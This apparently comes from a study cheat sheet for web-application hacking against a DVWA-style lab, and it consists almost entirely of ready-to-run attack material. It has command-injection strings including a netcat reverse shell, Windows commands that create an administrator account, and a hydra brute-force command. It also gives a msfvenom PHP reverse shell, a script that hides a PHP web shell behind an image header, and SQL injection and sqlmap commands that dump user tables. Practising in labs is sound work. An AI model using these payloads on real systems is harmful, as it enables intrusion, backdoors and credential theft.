Hacking Web Applications and Web Servers

Command Execution

Linux

  • 127.0.0.1 && ls

  • 127.0.0.1 & ls

  • 127.0.0.1 & ls

  • 127.0.0.1 ; ls

  • 127.0.0.1 | ls - with space

  • 127.0.0.1 |ls - without space

  • 127.0.0.1 && nc -c sh 127.0.0.1 9001

Windows

  • hostname

  • whoami

  • tasklist

  • taskkill /PID 3112 /F - forcefully kills the processes

  • dir c:\\

  • net user

  • net user test /add - add a new user

  • net localgroup Administrators test /add - add test user to administrators

  • net user test - details of the user

  • dir c:\\”pin.txt”

  • type c:\\”pin.txt”


Brute-Forcing

hydra -l admin -P /usr/share/wordlists/john.lst 'http-get-form://127.0.0.1:42001/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=7vs4mhc1q4dnp3f6cgikl01v9q; security=low:F=Username and/or password incorrect’

File Upload

  • msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php

  • exploit.php.img

  • GIf89a; - add this line to any file to make it as image file

  • use multi/handler

# PHP reverse shell of type image/jpeg
fh = open('shell.php', 'wb')
fh.write(b'\\xFF\\xD8\\xFF\\xE0' + b'<? passthru($_GET["cmd"]); ?>')
fh.close()

SQL Injection

Manual

  • 1’ UNION SELECT user, password FROM users#

Sqlmap

  • sqlmap -r req.txt --batch

  • sqlmap -r req.txt --batch --level=5 --risk=3

  • sqlmap -r req.txt --batch --level=5 --risk=3 --current-db

  • sqlmap -r req.txt -D dvwa --tables

  • sqlmap -r req.txt -D dvwa -T users --columns

  • sqlmap -r req.txt -D dvwa -T users --dump

Last updated